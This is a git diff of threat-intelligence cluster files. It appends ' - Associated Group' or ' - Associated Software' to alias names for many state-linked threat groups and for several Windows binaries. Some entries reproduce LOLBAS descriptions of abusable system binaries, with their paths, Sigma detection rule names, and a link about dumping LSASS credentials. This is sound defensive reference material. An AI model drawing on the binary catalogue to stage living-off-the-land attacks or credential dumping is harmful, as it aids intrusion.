Smilodon" + "value": "Earth Smilodon - Associated Group" }, { "description": "[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)][[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]", @@ -9068,7 +9068,7 @@ } ], "uuid": "851cfd6f-8ca5-4048-b5a0-c23729456f12", - "value": "TG-3390" + "value": "TG-3390 - Associated Group" }, { "description": "[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)][[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)]", @@ -9082,7 +9082,7 @@ } ], "uuid": "621b8362-b819-40af-8534-80efd9af3fd1", - "value": "BRONZE UNION" + "value": "BRONZE UNION - Associated Group" }, { "description": "[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -9096,7 +9096,7 @@ } ], "uuid": "0aec785f-db69-49f4-ad4f-68fe226a5399", - "value": "Iron Tiger" + "value": "Iron Tiger - Associated Group" }, { "description": "[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -9110,7 +9110,7 @@ } ], "uuid": "869b23ab-c9a6-4fa3-abc8-2982707e68d7", - "value": "LuckyMouse" + "value": "LuckyMouse - Associated Group" }, { "description": "[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)][[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Unit42 Emissary Panda May 2019](https://app.tidalcyber.com/references/3a3ec86c-88da-40ab-8e5f-a7d5102c026b)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -9124,7 +9124,7 @@ } ], "uuid": "6892414f-3428-4ff4-bb27-cefb2c7177e4", - "value": "Emissary Panda" + "value": "Emissary Panda - Associated Group" }, { "description": "[[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", @@ -9138,7 +9138,7 @@ } ], "uuid": "bc77908c-dcb0-4d07-933d-a1dded911306", - "value": "APT27" + "value": "APT27 - Associated Group" }, { "description": "[Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) is a Chinese threat group that has extensively used strategic Web compromises to target victims.[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)] The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]", @@ -9261,7 +9261,7 @@ } ], "uuid": "aee5a88d-6695-4221-a4fb-1f7aa1bfdcd4", - "value": "BRONZE HUNTLEY" + "value": "BRONZE HUNTLEY - Associated Group" }, { "description": "[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)][[CrowdStrike Manufacturing Threat July 2020](https://app.tidalcyber.com/references/5ed6a702-dcc5-4021-95cc-5b720dbd8774)]", @@ -9275,7 +9275,7 @@ } ], "uuid": "7e6588d8-8d1e-4ed0-a233-38f3b37c2aad", - "value": "Karma Panda" + "value": "Karma Panda - Associated Group" }, { "description": "[[TrendMicro Tonto Team October 2020](https://app.tidalcyber.com/references/140e6b01-6b98-4f82-9455-0c84b3856b86)]", @@ -9289,7 +9289,7 @@ } ], "uuid": "9f9382c1-edc9-434c-945a-71bfdf28ca6f", - "value": "Earth Akhlut" + "value": "Earth Akhlut - Associated Group" }, { "description": "[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)]", @@ -9303,7 +9303,7 @@ } ], "uuid": "70c9c7d6-d51a-4c73-823f-fffd0d75f63e", - "value": "CactusPete" + "value": "CactusPete - Associated Group" }, { "description": "[Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)][[ESET Exchange Mar 2021](https://app.tidalcyber.com/references/c83f1810-22bb-4def-ab2f-3f3d67703f47)][[FireEye Chinese Espionage October 2019](https://app.tidalcyber.com/references/d37c069c-7fb8-44e1-8377-da97e8bbcf67)][[ARS Technica China Hack SK April 2017](https://app.tidalcyber.com/references/c9c647b6-f4fb-44d6-9376-23c1ae9520b4)][[Trend Micro HeartBeat Campaign January 2013](https://app.tidalcyber.com/references/f42a36c2-1ca5-49ff-a7ec-7de90379a6d5)][[Talos Bisonal 10 Years March 2020](https://app.tidalcyber.com/references/6844e59b-d393-43df-9978-e3e3cc7b8db6)]", @@ -9368,7 +9368,7 @@ } ], "uuid": "150aeea7-b49e-49cf-a884-f9e0f69a6742", - "value": "Mythic Leopard" + "value": "Mythic Leopard - Associated Group" }, { "description": "[[Secureworks COPPER FIELDSTONE Profile](https://app.tidalcyber.com/references/d7f5f154-3638-47c1-8e1e-a30a6504a735)]", @@ -9382,7 +9382,7 @@ } ], "uuid": "4db20d24-3005-4fbb-af6e-94bb3841c25b", - "value": "COPPER FIELDSTONE" + "value": "COPPER FIELDSTONE - Associated Group" }, { "description": "[[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]", @@ -9396,7 +9396,7 @@ } ], "uuid": "da9e7789-2d64-4684-87b9-8185f11b7410", - "value": "APT36" + "value": "APT36 - Associated Group" }, { "description": "[[Unit 42 ProjectM March 2016](https://app.tidalcyber.com/references/adee82e6-a74a-4a91-ab5a-97847b135ca3)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)]", @@ -9410,7 +9410,7 @@ } ], "uuid": "6d979811-8a41-4407-be4b-b657a3bd3d20", - "value": "ProjectM" + "value": "ProjectM - Associated Group" }, { "description": "[Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.[[Proofpoint Operation Transparent Tribe March 2016](https://app.tidalcyber.com/references/8e39d0da-114f-4ae6-8130-ca1380077d6a)][[Kaspersky Transparent Tribe August 2020](https://app.tidalcyber.com/references/42c7faa2-f664-4e4a-9d23-93c88a09da5b)][[Talos Transparent Tribe May 2021](https://app.tidalcyber.com/references/5d58c285-bc7d-4a8a-a96a-ac7118c1089d)]", @@ -9489,7 +9489,7 @@ } ], "uuid": "72ad17b4-d973-48c4-aae9-5a95aaf2ee88", - "value": "KeyBoy" + "value": "KeyBoy - Associated Group" }, { "description": "[[Crowdstrike Pirate Panda April 2020](https://app.tidalcyber.com/references/f71410b4-5f79-439a-ae9e-8965f9bc577f)]", @@ -9503,7 +9503,7 @@ } ], "uuid": "7157a2fe-6e59-40ae-a7de-4961444f9c56", - "value": "Pirate Panda" + "value": "Pirate Panda - Associated Group" }, { "description": "[Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.[[TrendMicro Tropic Trooper Mar 2018](https://app.tidalcyber.com/references/5d69d122-13bc-45c4-95ab-68283a21b699)][[Unit 42 Tropic Trooper Nov 2016](https://app.tidalcyber.com/references/cad84e3d-9506-44f8-bdd9-d090e6ce9b06)][[TrendMicro Tropic Trooper May 2020](https://app.tidalcyber.com/references/4fbc1df0-f174-4461-817d-0baf6e947ba1)]", @@ -9555,7 +9555,7 @@ } ], "uuid": "58827a83-6a90-4cee-8b9a-7c033bf90dee", - "value": "Waterbug" + "value": "Waterbug - Associated Group" }, { "description": "WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.[[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)][[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", @@ -9569,7 +9569,7 @@ } ], "uuid": "9cea8cef-dd46-4997-baba-d2dea899e193", - "value": "WhiteBear" + "value": "WhiteBear - Associated Group" }, { "description": "[[Secureworks IRON HUNTER Profile](https://app.tidalcyber.com/references/af5cb7da-61e0-49dc-8132-c019ce5ea6d3)]", @@ -9583,7 +9583,7 @@ } ], "uuid": "1bf28831-a2fd-4dc5-885c-9cdf84d43535", - "value": "IRON HUNTER" + "value": "IRON HUNTER - Associated Group" }, { "description": "[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]", @@ -9597,7 +9597,7 @@ } ], "uuid": "3cf95a2f-a7b8-4061-b477-16729657f8f3", - "value": "Group 88" + "value": "Group 88 - Associated Group" }, { "description": "[[Accenture HyperStack October 2020](https://app.tidalcyber.com/references/680f2a0b-f69d-48bd-93ed-20ee2f79e3f7)]", @@ -9611,7 +9611,7 @@ } ], "uuid": "4087cefb-c0d4-401b-aa6c-dca93aed1c3c", - "value": "Belugasturgeon" + "value": "Belugasturgeon - Associated Group" }, { "description": "[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)][[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)][[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", @@ -9625,7 +9625,7 @@ } ], "uuid": "e934559a-b3c1-4e72-a5c9-e1abd7b2ae78", - "value": "Snake" + "value": "Snake - Associated Group" }, { "description": "[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)]", @@ -9639,7 +9639,7 @@ } ], "uuid": "7a2f17eb-6674-461d-89c4-6f40e1b6cdf5", - "value": "Krypton" + "value": "Krypton - Associated Group" }, { "description": "[[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)][[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]", @@ -9653,7 +9653,7 @@ } ], "uuid": "3637113f-d45f-4c97-aec0-16eaa7e3fc62", - "value": "Venomous Bear" + "value": "Venomous Bear - Associated Group" }, { "description": "[Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB). They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as [Uroburos](https://app.tidalcyber.com/software/89ffc27c-b81f-473a-87d6-907cacdce61c).[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)][[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)][[CrowdStrike VENOMOUS BEAR](https://app.tidalcyber.com/references/ee400057-2b26-4464-96b4-484c9eb9d5c2)][[ESET Turla Mosquito Jan 2018](https://app.tidalcyber.com/references/cd177c2e-ef22-47be-9926-61e25fd5f33b)][[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023](https://app.tidalcyber.com/references/1931b80a-effb-59ec-acae-c0f17efb8cad)]", @@ -9873,7 +9873,7 @@ } ], "uuid": "3dc34f21-1b3f-4952-97e9-c9df61379962", - "value": "Lebanese Cedar" + "value": "Lebanese Cedar - Associated Group" }, { "description": "[Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937) has been operating since 2012 and is motivated by political and ideological interests.[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)][[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]", @@ -9961,7 +9961,7 @@ } ], "uuid": "a7d8b128-d997-5d59-9aa2-9db35ff658c7", - "value": "BRONZE SILHOUETTE" + "value": "BRONZE SILHOUETTE - Associated Group" }, { "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", @@ -9977,7 +9977,7 @@ } ], "uuid": "33ec6e60-3e48-4ad8-9960-d59af6260c52", - "value": "Vanguard Panda" + "value": "Vanguard Panda - Associated Group" }, { "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", @@ -9993,7 +9993,7 @@ } ], "uuid": "dba5e3cd-8c54-4129-a4f3-adcb1ded182a", - "value": "Dev-0391" + "value": "Dev-0391 - Associated Group" }, { "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", @@ -10009,7 +10009,7 @@ } ], "uuid": "b38b4cff-e574-4d39-b2c5-365bcb14b7b6", - "value": "UNC3236" + "value": "UNC3236 - Associated Group" }, { "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", @@ -10025,7 +10025,7 @@ } ], "uuid": "950dd0a9-0045-4956-bf7b-3b3be491b086", - "value": "Voltzite" + "value": "Voltzite - Associated Group" }, { "description": "[[U.S. CISA Volt Typhoon February 7 2024](/references/c74f5ecf-8810-4670-b778-24171c078724)]", @@ -10041,7 +10041,7 @@ } ], "uuid": "c93b36a8-c2b7-4f54-830e-86040830a9f5", - "value": "Insidious Taurus" + "value": "Insidious Taurus - Associated Group" }, { "description": "[Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) typically focuses on espionage and information gathering and has targeted critical infrastructure organizations in the US including Guam. [Volt Typhoon](https://app.tidalcyber.com/groups/4ea1245f-3f35-5168-bd10-1fc49142fd4e) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.[[Microsoft Volt Typhoon May 2023](https://app.tidalcyber.com/references/8b74f0b7-9719-598c-b3ee-61d734393e6f)][[Joint Cybersecurity Advisory Volt Typhoon June 2023](https://app.tidalcyber.com/references/14872f08-e219-5c0d-a2d7-43a3ba348b4b)][[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]", @@ -10149,7 +10149,7 @@ } ], "uuid": "9e192d35-5371-4e21-bc63-62e10a8a5a44", - "value": "Bahamut" + "value": "Bahamut - Associated Group" }, { "description": "[Windshift](https://app.tidalcyber.com/groups/4e880d01-313a-4926-8470-78c48824aa82) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)][[objective-see windtail1 dec 2018](https://app.tidalcyber.com/references/7a32c962-8050-45de-8b90-8644be5109d9)][[objective-see windtail2 jan 2019](https://app.tidalcyber.com/references/e6bdc679-ee0c-4f34-b5bc-0d6a26485b36)]", @@ -10185,7 +10185,7 @@ } ], "uuid": "453f7dbf-bde7-4cf3-af5d-a6ac10335980", - "value": "Blackfly" + "value": "Blackfly - Associated Group" }, { "description": "[Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)][[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)][[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)] Some reporting suggests a number of other groups, including [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca), [APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094), and [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8), are closely linked to [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).[[401 TRG Winnti Umbrella May 2018](https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]", @@ -10256,7 +10256,7 @@ } ], "uuid": "1a9f2244-d35f-45d1-8f53-d1421498006d", - "value": "TEMP.MixMaster" + "value": "TEMP.MixMaster - Associated Group" }, { "description": "[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)][[CrowdStrike Grim Spider May 2019](https://app.tidalcyber.com/references/103f2b78-81ed-4096-a67a-dedaffd67e9b)]", @@ -10270,7 +10270,7 @@ } ], "uuid": "2924354f-bbaa-4c1b-8af0-a78976b1eff2", - "value": "Grim Spider" + "value": "Grim Spider - Associated Group" }, { "description": "[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]", @@ -10284,7 +10284,7 @@ } ], "uuid": "e0313186-a5f5-4bb0-94a0-b2b5d496bbc6", - "value": "UNC1878" + "value": "UNC1878 - Associated Group" }, { "description": "[[Mandiant FIN12 Oct 2021](https://app.tidalcyber.com/references/4514d7cc-b999-5711-a398-d90e5d3570f2)]", @@ -10298,7 +10298,7 @@ } ], "uuid": "91e61805-508f-536c-8e8e-89a5a24ae511", - "value": "FIN12" + "value": "FIN12 - Associated Group" }, { "description": "[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]", @@ -10312,7 +10312,7 @@ } ], "uuid": "c521ebb3-4303-5fef-a1fb-bd0e9f6a79a7", - "value": "GOLD BLACKBURN" + "value": "GOLD BLACKBURN - Associated Group" }, { "description": "[[IBM X-Force ITG23 Oct 2021](https://app.tidalcyber.com/references/d796e773-7335-549f-a79b-a2961f85a8ec)]", @@ -10326,7 +10326,7 @@ } ], "uuid": "e03d13ed-35ac-59e3-afa0-b06cdf5eb534", - "value": "ITG23" + "value": "ITG23 - Associated Group" }, { "description": "[[Secureworks Gold Blackburn Mar 2022](https://app.tidalcyber.com/references/b6b27fa9-488c-5b6d-8e12-fe8371846cd3)]", @@ -10340,7 +10340,7 @@ } ], "uuid": "c049da64-915b-58ee-abf1-9d485159d2e0", - "value": "Periwinkle Tempest" + "value": "Periwinkle Tempest - Associated Group" }, { "description": "[Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) since at least 2016. [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) possesses a diverse aresenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)][[DHS/CISA Ransomware Targeting Healthcare October 2020](https://app.tidalcyber.com/references/984e86e6-32e4-493c-8172-3d29de4720cc)][[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]", @@ -10445,7 +10445,7 @@ } ], "uuid": "f17739da-dd35-4e1e-ab48-e27d9cd08caf", - "value": "APT31" + "value": "APT31 - Associated Group" }, { "description": "[ZIRCONIUM](https://app.tidalcyber.com/groups/5e34409e-2f55-4384-b519-80747d02394c) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.[[Microsoft Targeting Elections September 2020](https://app.tidalcyber.com/references/1d7070fd-01be-4776-bb21-13368a6173b1)][[Check Point APT31 February 2021](https://app.tidalcyber.com/references/84ac99ef-106f-44e9-97f0-3eda90570932)]", diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index e096371..e68ae49 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -79,7 +79,7 @@ } ], "uuid": "b7942342-d390-408d-8d11-edff76322ff3", - "value": "7-zip" + "value": "7-zip - Associated Software" }, { "description": "7-Zip is a tool used to compress files into an archive.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", @@ -195,7 +195,7 @@ } ], "uuid": "9a77d9ce-dd34-4ff9-8b26-c74ef5055a2f", - "value": "AccCheckConsole.exe" + "value": "AccCheckConsole.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Verifies UI accessibility requirements\n\n**Author:** bohops\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe\n\n**Resources:**\n* [https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340](https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340)\n* [https://twitter.com/bohops/status/1477717351017680899](https://twitter.com/bohops/status/1477717351017680899)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_acccheckconsole.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml)\n* IOC: Sysmon Event ID 1 - Process Creation\n* Analysis: [https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340](https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340)[[AccCheckConsole.exe - LOLBAS Project](/references/de5523bd-e735-4751-84e9-a1be1d2980ec)]", @@ -312,7 +312,7 @@ } ], "uuid": "200ecd1e-c1a6-41a3-bb9a-ee687334c2c1", - "value": "AddinUtil.exe" + "value": "AddinUtil.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** .NET Tool used for updating cache files for Microsoft Office Add-Ins.\n\n**Author:** Michael McKinley @MckinleyMike\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe\n\n**Resources:**\n* [https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html](https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_addinutil_suspicious_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml)\n* Sigma: [proc_creation_win_addinutil_uncommon_child_process.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml)\n* Sigma: [proc_creation_win_addinutil_uncommon_cmdline.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml)\n* Sigma: [proc_creation_win_addinutil_uncommon_dir_exec.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml)[[AddinUtil.exe - LOLBAS Project](/references/91af546d-0a56-4c17-b292-6257943a8aba)]", @@ -422,7 +422,7 @@ } ], "uuid": "1db1d4d7-d442-457d-afb9-5c3dcb21645a", - "value": "adplus.exe" + "value": "adplus.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging tool included with Windows Debugging Tools\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe\n\n**Resources:**\n* [https://mrd0x.com/adplus-debugging-tool-lsass-dump/](https://mrd0x.com/adplus-debugging-tool-lsass-dump/)\n* [https://twitter.com/nas_bench/status/1534916659676422152](https://twitter.com/nas_bench/status/1534916659676422152)\n* [https://twitter.com/nas_bench/status/1534915321856917506](https://twitter.com/nas_bench/status/1534915321856917506)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_adplus.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[adplus.exe - LOLBAS Project](/references/d407ca0a-7ace-4dc5-947d-69a1e5a1d459)]", @@ -580,7 +580,7 @@ } ], "uuid": "0c7f7926-3935-46ea-b430-3841acab3120", - "value": "Advpack.dll" + "value": "Advpack.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Utility for installing software and drivers with rundll32.exe\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\advpack.dll\n* c:\\windows\\syswow64\\advpack.dll\n\n**Resources:**\n* [https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/](https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/)\n* [https://twitter.com/ItsReallyNick/status/967859147977850880](https://twitter.com/ItsReallyNick/status/967859147977850880)\n* [https://twitter.com/bohops/status/974497123101179904](https://twitter.com/bohops/status/974497123101179904)\n* 